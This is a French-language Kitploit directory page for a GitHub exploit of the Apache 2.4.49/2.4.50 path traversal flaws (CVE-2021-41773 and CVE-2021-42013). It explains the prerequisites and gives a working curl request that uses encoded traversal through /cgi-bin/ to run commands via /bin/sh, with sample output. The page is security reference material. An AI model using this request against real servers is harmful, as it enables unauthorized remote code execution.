Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-41773 — Exploit d'exécution de code à distance pour les serveurs Apache. Versions concernées : Apache 2.4.49, Apache 2.4.50 | Kitploit
Outils/GitHubGitHub/mr-exo/cve-2021-41773
ReconnaissanceGénération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubmr-exo/cve-2021-41773

CVE-2021-41773

Exploit d'exécution de code à distance pour les serveurs Apache. Versions concernées : Apache 2.4.49, Apache 2.4.50

Voir le dépôt
11il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit RCE à la fois pour Apache 2.4.49 (CVE-2021-41773) et 2.4.50 (CVE-2021-42013) :

À mon humble avis, seules les configurations « spéciales » seront vulnérables à cette RCE.
Il en va de même pour les exploits de « lecture arbitraire de fichier » que vous avez vus.

Les deux CVE sont en réalité presque la même vulnérabilité de traversée de chemin (la deuxième est le correctif incomplet de la première).
La traversée de chemin ne fonctionne qu'à partir d'une URI mappée (par exemple via les directives Apache « Alias » ou « ScriptAlias »). Le DocumentRoot seul ne suffit pas.

« /cgi-bin/ » est mappé par défaut (ScriptAlias), c'est pourquoi il est utilisé avant la chaîne de traversée de chemin.
De plus, ScriptAlias marque comme Exec (pour Apache) tout le contenu du répertoire donné (quelles que soient les extensions de fichier).

Prérequis :

1/ mod_cgi activé (pas par défaut mais facile)
2/ le binaire cible doit être +x (par défaut pour /bin/sh)
3/ les permissions Apache doivent être accordées pour /bin ou / (pas par défaut et difficile/irréaliste)

Vérifier si le serveur est vulnérable :

curl 'http://IPADDR/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'

Réponse d'un serveur vulnérable :

uid=1(daemon) gid=1(daemon) groups=1(daemon)

Télécharger l’outil